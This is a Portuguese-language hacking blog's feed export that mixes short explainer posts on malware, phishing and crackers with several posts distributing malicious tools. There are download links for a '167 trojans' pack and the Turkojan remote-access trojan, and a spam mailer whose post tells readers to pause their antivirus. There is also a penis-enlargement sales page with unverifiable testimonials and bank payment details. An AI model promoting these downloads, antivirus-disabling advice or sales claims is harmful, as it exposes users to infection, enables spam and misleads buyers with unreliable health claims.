tag:blogger.com,1999:blog-84655467820833929812024-03-05T08:08:18.131-08:00-=|Guerreiros Hacker|=- Jogos,Software,Programas Hacker,Portables,Msn,Comunidade,Chat , Templates..John Lennon http://www.blogger.com/profile/14308640151854725076noreply@blogger.comBlogger847125tag:blogger.com,1999:blog-8465546782083392981.post-70210327750608020752016-01-19T05:25:00.002-08:002016-01-19T05:25:38.021-08:00Magazine Luiza<div data-mvc-banner="medium-rectangle"></div><script type="text/javascript">
(function(storeName) {
var b = document.createElement('script'); b.type = 'text/javascript'; b.async = true;
b.src = 'https://www.magazinevoce.com.br/js/banner.js?store='+ storeName;
var s = document.getElementsByTagName('script')[0]; s.parentNode.insertBefore(b, s);
})('lenoarte');
</script>John Lennon http://www.blogger.com/profile/14308640151854725076noreply@blogger.com0tag:blogger.com,1999:blog-8465546782083392981.post-62908738521723406232011-09-20T13:54:00.000-07:002011-09-20T13:57:06.175-07:00167 TrojansChega de ficar baixando trojans Por ai cheio de virus. estamos com um pacotão com 167 trojans. para todos os gosto. LINK PARA DOWNLOAD<br /><br /> <a href="http://uploading.com/files/c5865128/167%2BTrojans%2B-%2Bwww.guerreiroshacker.blogspot.com.rar/">167 Trojans - www.guerreiroshacker.blogspot.com.rar - 184.5 MB</a>John Lennon http://www.blogger.com/profile/14308640151854725076noreply@blogger.com0tag:blogger.com,1999:blog-8465546782083392981.post-48691395690492707092011-02-16T08:43:00.000-08:002011-02-16T08:53:05.159-08:00Baratinhoh<a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://baratinhoh.blogspot.com"><img style="display:block; margin:0px auto 10px; text-align:center;cursor:pointer; cursor:hand;width: 200px; height: 50px;" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiPh6DkbcszaennikPtingdkUEiYN3kZBxu5Xae2bRhIaC6wg2EvgYPNY7hjxHvb_hVZ_2zy5aiSjSaduXckwr7DDw_4vh6MYnua1oLs6BqRS9rPc519cjEbc_25vFK_V_msxkUdhHZQlI/s320/Untitled-1.gif" border="0" alt=""id="BLOGGER_PHOTO_ID_5574330645844652578" /></a>John Lennon http://www.blogger.com/profile/14308640151854725076noreply@blogger.com0tag:blogger.com,1999:blog-8465546782083392981.post-2244213207096371792011-01-24T18:27:00.000-08:002011-01-24T19:05:53.720-08:00TURKOJAN V5.0.1<a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://www.4shared.com/file/i3DMGF1W/TURKOJAN_V51.html"><img style="display:block; margin:0px auto 10px; text-align:center;cursor:pointer; cursor:hand;width: 265px; height: 320px;" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjZcO_LU4L2sGqkNCfsBjqorLJ41alxpbq6BFKNJ_y4Cr66S731vVrGmDamQ2BauBJUCpo25SoAk6ywoqKzMjcHB1Ojev7YoMmZZUqs2IQZqYxz6vWmwQjxiANkHkAKrvme8sFe0k3iLd4/s320/turkojan5.PNG" border="0" alt=""id="BLOGGER_PHOTO_ID_5565953110056150546" /></a><br /><span style="font-weight:bold;">Para fazer o download basta clica na Imagen!!!<br /><br />Turkojan v5.1<br /></span>John Lennon http://www.blogger.com/profile/14308640151854725076noreply@blogger.com0tag:blogger.com,1999:blog-8465546782083392981.post-43153371670780610122011-01-17T09:40:00.000-08:002011-09-20T11:12:00.932-07:00Potência do homem<span style="font-weight:bold;"># Ter um Pênis MAIOR em até 10 cm<br /># Como deixar seu Pênis mais GROSSO<br /># Aprender a Controlar sua Ejaculação por horas<br /># Ter ereções duras e prolongadas, transando muito mais<br /># Ter Orgasmos Poderosos com muito mais prazer<br /># Corrigir a Curvatura e ter mais prazer<br /># Combater a Impotência<br /># Guia do Orgasmo Feminino e muito mais!<br />.................... Nº 1 DO BRASIL A 9 ANOS..........................<br /><br /><a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEieI3cdshxVzZThhLBs2Lv9LhWGIUIyYvfaVUX7TmheeorWB1EcI1gb-3Q2qC0wkETI3_DbqGvdK3JoKdgEmmZTUKSwwlw0fTXd6hsvAwEUflg5ijQsOLivF2Yu76M9EzUguhXPkL1XeY8/s1600/antes_depois.jpg"><img style="display:block; margin:0px auto 10px; text-align:center;cursor:pointer; cursor:hand;width: 320px; height: 120px;" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEieI3cdshxVzZThhLBs2Lv9LhWGIUIyYvfaVUX7TmheeorWB1EcI1gb-3Q2qC0wkETI3_DbqGvdK3JoKdgEmmZTUKSwwlw0fTXd6hsvAwEUflg5ijQsOLivF2Yu76M9EzUguhXPkL1XeY8/s320/antes_depois.jpg" border="0" alt=""id="BLOGGER_PHOTO_ID_5563216618982707346" /></a><br /><br /><a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEip4gL0bEoFKJkPRk2clq8YLy05EVrl8TnlblTErzPv1yE1045MfrGxTerG0wAueIAYipN8yYos_LVrVbPQW5d_c4xMcyFOttH5e817PDCcKTBX1LCpb_vlzuHaVe1_kQqCTq_u3ZvL310/s1600/paulo.jpg"><img style="display:block; margin:0px auto 10px; text-align:center;cursor:pointer; cursor:hand;width: 320px; height: 101px;" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEip4gL0bEoFKJkPRk2clq8YLy05EVrl8TnlblTErzPv1yE1045MfrGxTerG0wAueIAYipN8yYos_LVrVbPQW5d_c4xMcyFOttH5e817PDCcKTBX1LCpb_vlzuHaVe1_kQqCTq_u3ZvL310/s320/paulo.jpg" border="0" alt=""id="BLOGGER_PHOTO_ID_5563217177672079906" /></a></span><br /><br /><br /><br /><br /><span style="font-weight:bold;">APROVEITE, VOCÊ TEM POUCO TEMPO PARA APROVEITAR ESTA CHANCE. DESCUBRA TODOS OS SEGREDOS<br />Em nossa pesquisa encontramos uma taxa de 98% de sucesso com todos que possuiam as informações que hoje você encontra no Potência do Homem PHX. Você não precisa usar qualquer outro dispositivo. Todos estes exercícios usam de nada mais que suas mãos.<br /><br />E quanto tudo isso me custará? A resposta é NADA!!!!<br />Caro amigo, a idéia de custo NÃO EXISTE AQUI. Quando algo custa é porque com o tempo perderá valor.<br />ESTAS INFORMAÇÕES NÃO DESVALORIZAM.<br /><br />Afinal o investimento é feito sobre você mesmo. Não há melhor investimento que este. Você é seu maior bem, por isso, tudo o que puder melhorar em sua vida não custa nada. O investimento que você fará será insignificante perto dos benefícios que ele lhe trará de volta. Uma mudança total na sua vida sexual, por um preço muito pequeno. Isso mesmo!!!<br />Todos estes benefícios, incluindo os bônus, tudo isso por apenas R$ 60,00 ( até 23/12/2011, preço normal R$ 109,90 )<br />Pense: você pode mudar sua vida sexual e SE TORNAR UM AMANTE PERFEITO por um valor muito baixo.<br />Aproveite o preço promocional, infelizmente em poucos dias provavelmente iremos praticar o preço normal. O preço atual é por poucos dias.<br /><br />E MAIS: PAGUE SOMENTE APÓS RECEBER O PRODUTO NO ENDEREÇO QUE DESEJAR.<br /><br />OU SEJA, ANTES DE RECEBER, NÃO PRECISARÁ PAGAR ABSOLUTAMENTE NADA!<br />SEGURANÇA TOTAL - 100% GARANTIDO. ESTAMOS A 9 ANOS NO MERCADO!<br /><br />+ PROMOÇÃO 2 BÔNUS GRÁTIS + CONTEÚDO PARA ACESSO VIA INTERNET<br />TUDO ISSO APENAS R$ 60,00 até o dia 23/12/2011<br />Aproveite, depois dessa data provavelmennte o preço irá aumentar.<br />Na promoção você levará os Bônus gratuitamente e terá desconto no POTÊNCIA DO HOMEM (O valor normal é de R$ 109,90).<br /><br />APROVEITE, INFORMAÇÕES APENAS DISPONÍVEÍS EM NOSSO SITE.<br />OFERTA EXCLUSIVA!! VOCÊ NÃO ENCONTRA ESTE CONTEÚDO QUE REUNIMOS EM NENHUM OUTRO LUGAR. INÉDITO NO BRASIL!<br />E mais ... VOCÊ SÓ PAGA O PRODUTO QUANDO RECEBER. 100% GARANTIDO, SEGURANÇA TOTAL.<br />Não perca tempo. Esta oferta é por tempo limitado e para um grupo restrito de pessoas. Totalmente sigiloso. APROVEITE ESTA OPORTUNIDADE, É POR TEMPO LIMITADO.<br /><br />LEMBRE-SE DOS BENEFÍCIOS:<br /><br />• Ter informações como alongar e também engrossar seu pênis.<br />• Você poderá ver resultados nas primeiras 2 a 3 semanas.<br />• Descobrir informações que poderá acabar impotência, aumentando a circulação sanguínea.<br />• Como fortalecer suas ereções e ser toda vez duro como pedra.<br />• Como controlar a ejaculação precoce (chega de apenas 2 minutos de sexo!).<br />• Como aumentar o poder de suas ejaculações.<br />• Prolongar e intensificar seus orgasmos.<br />• Dicas especiais para ajudar a endireitar um pênis torto.<br />• Como ter uma cabeça maior em seu pênis (como um cogumelo).<br />• Aumentar a circulação para um pênis mais distribuído física e globalmente.<br />• Encurtar o tempo de recuperação entre orgasmos.<br />• Aprender segredos surpreendentes do sexo com músculo PC.<br />• Manter sua ereção mais firme e mais dura, por muito mais tempo.<br />• Como aumentar o prazer da parceira.<br />• Como desenvolver seu músculo PC e alcançar um visual mais musculoso.<br />• E mais, muito mais informações vitais que todo homem deveria saber!<br /><br /><br /><br /><br />Olá, estou super satisfeito. Em 6 de novembro, meu pênis media 14,51 cm. Esta semana (5 de fevereiro) me sinto potente como nunca, muita força sexual!!!!! Maravilha!!!!! As informações que vocês organizaram são fantásticas. Acho que é fácil se tornar mais potente. Estou muito feliz com os resultados. Mal posso esperar para minha namorada chegar da faculdade. Ela está radiante com o a minha sede sexual e como sou um amante potente e viril . Depois dou notícias.<br />Abraço” RUI - SÃO PAULO<br /><br /><br /><br /><br />Olá amigos do POTÊNCIA DO HOMEM, não sei como agradecer vocês. Eu tinha um pênis bem pequeno, 10 cm e sempre quis saber se tinha como aumenta-lo. Um belo dia conheci o site de vocês e fiquei maravilhado com a proposta. Decidi comprar e logo de cara.<br />Consegui sair de 10 para 14 cm. Foi incrível. Minha vida mudou totalmente. E graças aos exercícios semana passada eu fiquei por 3 horas seguidas transando com minha namorada. Gostaria de parabenizar vocês, é um trabalho e tanto.” NICOLAU – MATO GROSSO<br /><br /><br /><br />Autora da descriçêo do produto By: Clarice<br /><br />Você que gosto da descriçao e que ver sua vida mudar adquirar Agora MESMO<br /><br />O produto e pago via deposito ou Pago pelo pagseguro UOL<br /><br /><!-- INICIO FORMULARIO BOTAO PAGSEGURO --><br /><form target="pagseguro" action="https://pagseguro.uol.com.br/v2/checkout/payment.html" method="post"><br /><input type="hidden" name="code" value="654BF5A59A9A00A994E9DFB536309999" /><br /><input type="image" src="https://p.simg.uol.com.br/out/pagseguro/i/botoes/pagamentos/99x61-comprar-assina.gif" name="submit" alt="Pague com PagSeguro - é rápido, grátis e seguro!" /><br /></form><br /><!-- FINAL FORMULARIO BOTAO PAGSEGURO --><br /><br />Agençia: 2955<br />Conta: 00013735-9<br />Digito: 013<br />Cliente: Clarice ferreira da silva<br /><br />Apos o pagamento mande um email para<br /><br />clarice_fds@live.com<br /><br /></span>John Lennon http://www.blogger.com/profile/14308640151854725076noreply@blogger.com0tag:blogger.com,1999:blog-8465546782083392981.post-71948755948945115162011-01-17T09:03:00.000-08:002011-01-17T09:23:30.483-08:00JC EMAIL DIRECT EXPRESS 4.2<a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj80WLnceSqn5oJJwjjyDs846g6vcsy_gvgNpeUeM8GKyLJZVsU91K7KkNSTee1arl6zLYig5ebrOGuo2DCSYSCFuED7joo69RXEjqf2KiW4mB9u-1fh8zlXZIlKbt-BIH5aDR657ClsIE/s1600/1+image.JPG"><img style="display:block; margin:0px auto 10px; text-align:center;cursor:pointer; cursor:hand;width: 320px; height: 240px;" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj80WLnceSqn5oJJwjjyDs846g6vcsy_gvgNpeUeM8GKyLJZVsU91K7KkNSTee1arl6zLYig5ebrOGuo2DCSYSCFuED7joo69RXEjqf2KiW4mB9u-1fh8zlXZIlKbt-BIH5aDR657ClsIE/s320/1+image.JPG" border="0" alt=""id="BLOGGER_PHOTO_ID_5563203498254197730" /></a><span style="font-weight:bold;">Com esse programa voce pode enviar ate 50 mil emails. E com ele voce pode esta enviando spam. pode esta divulgando seus blog. sites etc...Para baixar voce pausa seu anti virus. e na hora de uzalo tbm. porque ele peza muito seu computador. LINK ABAIXO PARA DOWNLOAD .<br /><br /><a href="http://www.4shared.com/file/a1QYAUVF/jc_email.html" target=_blank>DOWNLOAD</a></span>John Lennon http://www.blogger.com/profile/14308640151854725076noreply@blogger.com0tag:blogger.com,1999:blog-8465546782083392981.post-11635707534595665942010-12-16T20:15:00.000-08:002010-12-16T20:16:06.196-08:00Top Xat<embed src="http://www.xatech.com/web_gear/chat/chat.swf" quality="high" width="540" height="405" name="chat" flashvars="id=102287433" align="middle" allowscriptaccess="sameDomain" type="application/x-shockwave-flash" pluginspage="http://xat.com/update_flash.shtml" /><br /><small><a target="_BLANK" href="http://xat.com/web_gear/?cb">Get your own Chat Box!</a> <a target="_BLANK" href="http://xat.com/web_gear/chat/go_large.php?id=102287433">Go Large!</a></small><br /></embed><br /><br />Regras Do Chat<br /><br />Convercem a vontade, troque suas duvidas conheçam novos amigos,<br /><br />Duvidas de verdade serão respondidas no nosso fórum.<br /><br />Atenção o chat principal e apenas para entretenimento se tiver duvidas pergunte no PRIVADO para os responsáveis do mesmo..<br /><br />Algumas regras básicas por favor respeitem<br />1° Não Serão Permitidos quaisquer tipos de Mensagens Comerciais que não estejam vinculados à nosso Site (Ex: links de outros sites)<br />2° Não será permitido usar linguagem ofensiva, grosseira ou racista, nem publicar material calunioso<br />3° Probibido Floods, ou Spans<br /><br />4° Moderadores e amdmin da hm. somente serão membros as pessoas que relmente permanecem no chat<br /><br />5° Os moderadores e admin do xat serão escolhido por seleção não ensista em ser um tudo tem seu tempo.<br />Quaisquer dúvidas ou reclamações, favor procurar algum Dono ou Aministrador do Chat!John Lennon http://www.blogger.com/profile/14308640151854725076noreply@blogger.com0tag:blogger.com,1999:blog-8465546782083392981.post-66358860076053540352010-12-14T11:00:00.000-08:002010-12-14T11:01:47.206-08:00Entre e veja os melhores hacker para invasao!!!<span style="font-weight:bold;"></span>http://lenoreidelas.vilabol.uol.com.br/index.html<br /><br /><span style="font-weight:bold;"></span>http://lenonoestyle.sites.uol.com.br/blog/index.html-=|POSTADOR|=-http://www.blogger.com/profile/08622492888576344170noreply@blogger.com0tag:blogger.com,1999:blog-8465546782083392981.post-75591692965379229772010-08-03T12:55:00.001-07:002010-08-03T12:59:41.190-07:00Oque é Ftp<span style="font-weight:bold;">FTP significa File Transfer Protocol (Protocolo de Transferência de Arquivos), e é uma forma bastante rápida e versátil de transferir arquivos (também conhecidos como ficheiros), sendo uma das mais usadas na internet.<br /><br />Uma interface gráfica de um cliente FTPPode referir-se tanto ao protocolo quanto ao programa que implementa este protocolo (neste caso, tradicionalmente aparece em letras minúsculas, por influência do programa de transferência de arquivos do Unix).<br /><br />A transferência de dados em redes de computadores envolve normalmente transferência de ficheiros e acesso a sistemas de ficheiros remotos (com a mesma interface usada nos ficheiros locais). O FTP (RFC 959) é baseado no TCP, mas é anterior à pilha de protocolos TCP/IP, sendo posteriormente adaptado para o TCP/IP. É o standard da pilha TCP/IP para transferir ficheiros, é um protocolo genérico independente de hardware e do sistema operativo e transfere ficheiros por livre arbítrio, tendo em conta restrições de acesso e propriedades dos ficheiros.<br /><br />Modos e interfaces<br /><br />O protocolo subjacente ao FTP pode correr nos modos iterativo ou batch. O cliente FTP fornece uma interface interactiva, enquanto que o MIME e o HTTP usam-no diretamente. O protocolo permite a gravação e obtenção de ficheiros, a listagem do diretório e a alteração do diretório de trabalho.</span>John Lennon http://www.blogger.com/profile/14308640151854725076noreply@blogger.com0tag:blogger.com,1999:blog-8465546782083392981.post-44316351629158556332010-08-03T12:50:00.000-07:002010-08-03T12:54:23.116-07:00O que e Phishing<span style="font-weight:bold;">Phishing é uma forma de fraude eletrônica, caracterizada por tentativas de adquirir informações sensíveis, tais como senhas ..e números de cartão de crédito, ao se fazer passar como uma pessoa confiável ou uma empresa enviando uma comunicação eletrônica oficial, como um correio ou uma mensagem instantânea. O termo Phishing surge das cada vez mais sofisticadas artimanhas para "pescar" (do inglês fish) as informações sensíveis dos usuários. O que é Phishing?<br /><br />O golpe de phishing (também conhecido como phishing scam, ou apenas scam) é realizado por uma pessoa mal-intencionada através da criação de um website falso e/ou do envio de uma mensagem eletrônica falsa, geralmente um e-mail ou recado através de scrapbooks como no sítio Orkut, entre outros exemplos. Utilizando de pretextos falsos, tenta enganar o receptor da mensagem e induzi-lo a fornecer informações sensíveis (números de cartões de crédito, senhas, dados de contas bancárias, entre outras).</span>John Lennon http://www.blogger.com/profile/14308640151854725076noreply@blogger.com0tag:blogger.com,1999:blog-8465546782083392981.post-79295264115709441452010-08-03T12:48:00.000-07:002010-08-03T12:50:03.569-07:00O que e Malware<span style="font-weight:bold;">São spams e hoax com objetivos definidos , para obter dados de maneira fraudulenta, ou personificação de confiança para roubo de informações. Inclui nesta categoria os worms, spywares, trojans e vírus de computador.Ou seja são os virus, trojans, spans e hoax, Para ter Acesso Fraudulenta. ou Seja "Malware" é um termo geral normalmente aplicado ao nos referir-mos a qualquer software desenvolvido para causar danos em computadores, servidores ou redes de computador, e isso independentemente de o software ser um vírus, um spyware, etc.<br /><br />Portanto qualquer software, por exemplo um trojan, ou mesmo um worm, etc são denominados de "malware", o que informa que esses são software que causam MAL a um equipamento, software ou arquivo de dados de um usuário.<br /><br />Obviamente temos que sempre levar em conta os reais níveis de criticidade e risco a segurança causado por cada um dos grupos de malware. Com certeza um Spyware é muito menos perigoso (e seus fabricantes alegam que não levam nenhum risco!) que um vírus, trojan ou worm. </span>John Lennon http://www.blogger.com/profile/14308640151854725076noreply@blogger.com0tag:blogger.com,1999:blog-8465546782083392981.post-12109616020271213922010-08-03T12:47:00.000-07:002010-08-03T12:48:03.161-07:00O que e Trojan<span style="font-weight:bold;">O que é trojan<br />Um Trojan Horse é um programa que faz algum tipo de atividade maléfica porém ele não se espalha automaticamente.<br /><br />Geralmente, trojans são malware simples de se remover comparado aos worms e vírus.<br /><br />A maioria dos trojans incluem também o que chamamos de backdoor.<br /><br />Também existem os Trojan Droppers. Esses são identificados pelos antivírus como Dropper.X ou Trojan.Dropper/X. Os Droppers seguem a história de Tróia: Droppers são programas que deviam, por exemplo, tocar uma música, quando na verdade instalam o Trojan. Trojan Droppers são comuns em programas ilegais, como geradores de crédito para celulares e ferramentas para criação de vírus. </span>John Lennon http://www.blogger.com/profile/14308640151854725076noreply@blogger.com0tag:blogger.com,1999:blog-8465546782083392981.post-92082508554330387842010-08-03T12:43:00.000-07:002010-08-03T12:46:33.115-07:00O que e Spam<span style="font-weight:bold;">Já spam é o envio de mensagens não solicitadas, em grande número, a destinatários desconhecidos.<br /><br />Com certeza você já recebeu alguma mensagem pedindo para acessar um site, juntar-se a um esquema de pirâmide ou ainda comprar um produto. Pois todas estas mensagens, e outras, se não autorizadas ou requisitadas por voce, são spam. O termo spam surgiu de um episódio da série do Monty Python onde pessoas pediam insistentemente por spam (um produto enlatado americano). Uma pessoa que envia spams, é conhecida na internet como "spammer". O termo UCE (unsolicited commercial e-mail, e-email comercial não solicitado) também é muito usado e é basicamente o mesmo que um spam. Algumas pessoas diferenciam o spam do UCE pelo caráter comercial do segundo.<br />As vezes é preciso um pouco de bom senso e boa memória para saber se a mensagem que você recebeu se trata de um spam, pois é comum os spammers alegarem que você mesmo assinou uma lista ou pediu informações sobre determinado serviço, o que muitas vezes é uma falsa afirmação usada para justificar o envio dos spams.</span>John Lennon http://www.blogger.com/profile/14308640151854725076noreply@blogger.com0tag:blogger.com,1999:blog-8465546782083392981.post-72741058496916491012010-08-03T12:40:00.000-07:002010-08-03T12:42:12.169-07:00O que e Virus<span style="font-weight:bold;">Estritamente falando, vírus são códigos maliciosos capazes de infectar outros arquivos ou programas do disco rígido, assim se multiplicando. Entretanto, o termo vírus é associado popularmente com qualquer código malicioso, ou malware, incluindo cavalos de tróia, worms e até mesmo spywares e adwares.<br /><br />Nesse sentido, um vírus é qualquer programa de computador feito para incomodar, assustar, roubar dados ou danificar a máquina. Vírus são programas de computador como qualquer outro que você tenha instalado na sua máquina — a diferença é que vírus são instalados sem que você dê permissão.<br /><br />Existem vários tipos de vírus, são eles:<br /><br />Cavalos de Tróia — também conhecidos como Trojans, são programas maliciosos que não são capazes de se espalhar por si só. Muitos programas maliciosos (como backdoors abaixo) não se espalham por si só e portanto também caem na definição de cavalo de tróia.<br />Backdoor — (”porta dos fundos”) permite que um computador infectado seja controlado remotamente. </span>John Lennon http://www.blogger.com/profile/14308640151854725076noreply@blogger.com0tag:blogger.com,1999:blog-8465546782083392981.post-1616180526401385762010-08-03T12:37:00.000-07:002010-08-03T12:40:34.348-07:00O que e Cracker<span style="font-weight:bold;">ão indivíduos que mexem e alteram o funcionamento de um programa fazendo com que ele trabalhe da forma como ele quer, ou seja muitas empresas distribuem seus sofwares na forma TRIAL de 30 dias de utilização, os crackers usando de conhecimentos avançados de linguagem assembly e debuggando esses sofwares empresarias , fazem com que funcione mais de 30 dias ou acham chavés de registro vasculhando o código e registrando de forma ilegalmente o programa, muitas vezes posta seus CRACK,S na internet , seja pra jogos pra programas e etc.
<br />
<br />Cracker, de acordo com o significado originalmente cunhado ao termo, designa sim, elementos mal intencionados, que estudam e decodificam programas e linguagens a fim de causar danos a computadores alheios. A intenção é invadir e sabotar sistemas, quase sempre objetivando a captação de dados passíveis de render cifras. Ou seja, roubo eletrônico, estelionato ou o que quer que seja. A intenção é definitivamente ruim.
<br />
<br />Existem ainda diversas subdivisões para o termo cracker: cader, especialistas em fraudar cartões de crédito; defacer, indivíduo que desfigura as páginas principais de sites; e outros muitos, que expostos aqui só serviriam ao fomento da confusão entre os termos prioritariamente discutidos. Vale lembrar novamente a diferença entre bons e maus: hackers do bem, crackers do mau.
<br />
<br />O que existe e acontece comumente é a confusão entre o sentido das palavras hacker e cracker, confusão esta criada pelo uso informal da língua. E, sabemos, a língua é quem faz o dicionário. Dificilmente esta situação será revertida, em vista da publicação de termos errôneos pela mídia não especializada, porém de massas. Cientes desta condição, os verdadeiros e originais hackers (lembremos, pessoas do bem, interessadas no desenvolvimento e liberação das tecnologias) arranjaram um outro termo para identificá-los: agora são geeks! </span>John Lennon http://www.blogger.com/profile/14308640151854725076noreply@blogger.com0tag:blogger.com,1999:blog-8465546782083392981.post-38935604721907795692010-08-03T12:30:00.000-07:002010-08-03T12:37:19.069-07:00Historia da internet#<br /><br /><br />1836: O telégrafo é patenteado por Cooke e Wheatstone, iniciando as bases da telefonia. <br /># 1858: Surge o primeiro cabo transatlântico, permitindo a comunicação além do oceano Atlântico.<br /># 1876: Alexander Grahan Bell faz a demonstração do telefone, criando o futuro cenário para a Internet.<br /># 1962: Inventado o dispositivo de rede que permite dividir a informação em partes pequenas antes de ser transmitida.<br /># 1969: Nasce a Internet.<br /># 1971: A invenção do e-mail.<br /># 1973: Especificado o protocolo de transferência de arquivos. Isso revolucionou a maneira como os dados eram transmitidos ao redor do mundo.<br /># 1984: Surge o Servidor de Domínio de Nomes, tornando os endereços da Web mais fáceis de lembrar.<br /># 1991: A implementação dos servidores de ampla área de informação criou um mecanismo de índice de arquivos na Internet. Isso permitiu uma busca rápida por meio de palavras-chave.<br /># 1992: Entram no ar as primeiras videoconferências pela Net.<br /># 1996: Começa a guerra dos Web browsers entre a Microsoft e a Netscape.<br /># 2000: O programa de permuta de arquivos Napster surge e gera uma massiva controvérsia. O vírus The Love Letter espalha-se descontroladamente.John Lennon http://www.blogger.com/profile/14308640151854725076noreply@blogger.com0tag:blogger.com,1999:blog-8465546782083392981.post-54099894619766098112010-08-03T12:29:00.001-07:002010-08-03T12:29:54.222-07:00Seu nome na barra do explore<span style="font-weight:bold;">1- Iniciar/Executar e digite "gpedit.msc" sem as aspas e aperte Enter,<br /><br />2- Na janela que aparece, do lado esquerdo, clique em "Configuração de Usuário"<br /><br />3- Depois clique em "Configuração do Windows", "Manutenção do Internet Explorer" e "Interface do usuário navegador"<br /><br />4- Na coluna da direita dê um duplo clique em "Título do navegador"<br /><br />5- Na janela a seguir você poderá digitar o que quiser para aparecer na barra de título, marque a opção "Personalizar Barras de Título" e escreva por exemplo o seu próprio " Nome "<br /><br />Clique em OK e feche a janela Diretivas de grupo.<br /><br />Pronto, agora abra o Internet Explorer e vai estar lá em cima o nome assim:<br /><br />"Windows Internet Explorer fornecido por 'SEU NOME QUE VOCÊ COLOCOU LÁ'<br /><br /><br />Obs : Apenas Funciona no Windows XP </span>John Lennon http://www.blogger.com/profile/14308640151854725076noreply@blogger.com0tag:blogger.com,1999:blog-8465546782083392981.post-78722160008124065152010-08-03T12:26:00.000-07:002010-08-03T12:28:05.642-07:00Dica para c.s<span style="font-weight:bold;">bot_sniper_only - Bots compram somente Sniper<br /><br />bot_knives_only 1 - Bots usam somente faca<br /><br />cl_levellocks 16382 - Libera o modo All Deleted Scenes<br /><br />sv_cheats 1 - Habilita os Cheats<br /><br />Fly Faz - O personagem voar<br /><br />notarget - Inimigos não podem te ver<br /><br />noclip - Atravessa paredes<br /><br />god - Modo Deus<br /><br />kick - Dá kick Bots<br /><br />bot_kill - Mata todos os Bots<br /><br />bot_goto_mark #number - Faz o Bot ir para determinado lugar<br /><br />bot_zombie 1 - Faz os Bots ficarem parados</span>John Lennon http://www.blogger.com/profile/14308640151854725076noreply@blogger.com0tag:blogger.com,1999:blog-8465546782083392981.post-84655443334862217552010-08-03T12:25:00.001-07:002010-08-03T12:25:58.619-07:00Comandos do executarAccwiz.exe - Acessa o Assistente de Acessibilidade<br />Calc.exe - Executa o programa Calculadora<br />Charmap.exe - Executa o Mapa de Caracteres<br />ChkDsk.exe - Executa o Scandisk em ambiente simulado DOS<br />CleanMgr.exe - Executa a Limpeza de Disco<br />CliconFg.exe - Executa o utilidade Rede para clientes do SQL Server<br />CMD.exe - Executa o Prompt de Comando do DOS<br />Control.exe - Acessa o Painel de Controle<br />DxDiag.exe - Ferramenta de Diagnóstico do Direct X<br />EudCedit.exe - Executa Editor de caracteres especiais<br />Explorer.exe - Acessa o Windows Explorer<br />Magnify.exe - Executa a Lente de aumento do Windows XP<br />Mspaint.exe - Executa o Paint Brush<br />MsHearts.exe - Executa o Jogo de Copas<br />Mstsc.exe - Abre a janela para conexão de área de trabalho Remota<br />MSconfig.exe - Utilitário de configuração do Sistema<br />Notepad.exe - Acessa o Bloco de Notas<br />NetSetup.exe - Executa o Assistente para configuração de rede doméstica<br />Ntbackup.exe - Assistente para Backup e restauração<br />Osk.exe - Executa o teclado Virtual<br />PergMon.exe - Gerenciador de Desempenho do Windows XP<br />Regedit.exe - Acessa o ambiente de exploração do registro do Windows<br />Rstrui.exe - Executa o Assistente para restauração do Sistema<br />Sol.exe - Executa o Jogo Paciência<br />Spider.exe - Executa o Jogo Spider<br />Telnet.exe - Acessa o ambiente DOS possibilitando a comunicação Remota<br />TaskMgr.exe - Gerenciador de Tarefas do Windows<br />Winchat.exe - Bate Papo do Windows<br />Write.exe - Wordpad do Windows<br />Ferramentas Administrativas<br />gpedit.msc - Diretivas de Grupos<br />perfmon.msc - Serviço de componentes<br />compmgmt.msc - Gerenciamento do Computador<br />services.msc - Serviços<br />secpol.msc - Diretiva de Segunça Local<br />comexp.msc - Serviços de Componentes<br />odbcad32.exe - Fontes de Dados (ODBC)<br /><br />Assistente de controles => access.cpl<br />Assistente de acessibilidade => accwiz<br />Adicionar novo hardware => hdwwiz.cpl<br />Adicionar/Remover programas => appwiz.cpl<br />Ferramentas Admnistrativas => control admintools<br />Adobe Acrobat (Executar se instalado ) => acrobat<br />Adobe Designer (Executar se instalado ) => acrodist<br />Adobe Distiller (Executar se instalado ) => acrodist<br />Adobe ImageReady (Executar se instalado ) => imageready<br /><br />Adobe Photoshop (Executar se instalado ) => photoshop<br />Atualizações automáticas => wuaucpl.cpl<br />Assistente para transferência BlueTooth => fsquirt<br />Calculadora => calc<br />Gerenciador de Certeficados => certmgr.msc<br />Mapa de caracteres => charmap<br />Check Disk Utility => chkdsk<br />Visualizador da área de armazenamento => clipbrd<br />Janela de comandos DOS => cmd<br />Serviços de Componentes => dcomcnfg<br />Gerenciamento do computador => compmgmt.msc<br />Painel de Controle => control<br />Propriedades de data e tempo => timedate.cpl<br />DDE Shares => ddeshare<br />Gerenciamento de dispositivos => devmgmt.msc<br />Direct X Control Panel (Se instalado )* => directx.cpl<br />Direct X Troubleshooter => dxdiag<br />Limpeza de Disco => cleanmgr<br />Desfragmentador de Discos => dfrg.msc<br />Gerenciamento de Discos => diskmgmt.msc<br />Gerenciamento de partição de Discos => diskpart<br />Propriedades de Vídeo => control desktop<br />Propriedades de Vídeo => desk.cpl<br />Propriedades de Vídeo (aparência) => control color<br />Dr. Watson System Troubleshooting Utility => drwtsn32<br />Driver Verifier Utility => verifier<br />Event Viewer => eventvwr.msc<br />Assistente para transferência de arquivos e informações => migwiz<br />Verificação de assinatura de arquivo => sigverif<br />Busca rápida => findfast.cpl<br />Firefox (Executar se instalado ) => firefox<br />Propriedades de pasas => control folders<br />Fonts => control fonts<br />Fonts (Pasta) => fonts<br />Jogo FreeCell => freecell<br />Controle para Jogos => joy.cpl<br />Group Policy Editor (XP Prof) => gpedit.msc<br />Jogo de cartas => mshearts<br />Ajuda e suporte => helpctr<br />HyperTerminal => hypertrm<br />Iexpress Wizard => iexpress<br />Indexing Service => ciadv.msc<br />Internet Connection Wizard => 